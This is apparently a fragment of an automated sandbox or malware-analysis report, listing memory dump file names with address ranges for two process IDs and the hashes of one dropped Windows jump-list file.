memory/768-4-0x00007FFAE8730000-0x00007FFAE8740000-memory.dmp

memory/768-6-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp

memory/768-5-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp

memory/768-7-0x00007FFAE8730000-0x00007FFAE8740000-memory.dmp

memory/768-8-0x00007FFAE6360000-0x00007FFAE6370000-memory.dmp

memory/768-9-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp

memory/768-10-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp

memory/768-11-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp

memory/768-12-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp

memory/768-13-0x00007FFAE6360000-0x00007FFAE6370000-memory.dmp

memory/768-15-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp

memory/768-14-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp

memory/768-19-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp

memory/768-16-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp

memory/768-17-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp

memory/768-18-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp

memory/768-20-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp

memory/3940-40-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp

memory/3940-43-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp

memory/768-47-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp

memory/768-48-0x00007FFB2874D000-0x00007FFB2874E000-memory.dmp

memory/768-49-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp

memory/3940-53-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp

memory/3940-54-0x00007FF6DEBD0000-0x00007FF6DEBD8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 0bc1a7e10bfc93dd83ebfe412bdce0c4
SHA1 ab4b865243a6eb3207edf04fa39e31634a46bfaf
SHA256 e65776bbed99d0a78ceb04007acc55234ac117262113cf7caf997a67e72336e7
SHA512 f7797750983d75132998cd164656116cc4852339732a0f844ab0fe0590a8789999907af8f88fc0fe8ab22142b5d89aabe8b35aac3ac00a6b7f9583250834536d